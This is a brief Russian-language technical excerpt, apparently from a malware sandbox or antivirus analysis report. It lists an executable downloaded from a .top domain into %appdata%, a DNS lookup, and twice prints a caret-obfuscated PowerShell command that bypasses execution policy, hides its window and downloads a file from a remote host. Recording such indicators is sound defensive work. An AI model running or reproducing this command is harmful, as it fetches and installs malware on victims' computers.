Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^oW^e^r^sH^El^l^.^e^X^E^ -^eXEC^u^tIOnpOl^iCy^ b^yP^A^Ss^ ^-NO^p^ROfILe -W^i^NdowST^Y^L^e^ H^iddeN^ (nEw-^O^BJEcT sYst^EM.nEt^.w^EBC^LI^E^n^T).^DO^W^N^l^O^adfi^lE('http://w...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "p^oW^e^r^sH^El^l^.^e^X^E^ -^eXEC^u^tIOnpOl^iCy^ b^yP^A^Ss^ ^-NO^p^ROfILe -W^i^NdowST^Y^L^e^ H^iddeN^ (nEw-^O^BJEcT sYst^EM.nEt^.w^EBC^LI^E^n^T).^DO^W^N^l^O^adfi^lE('http://w...' (со скрытым окном)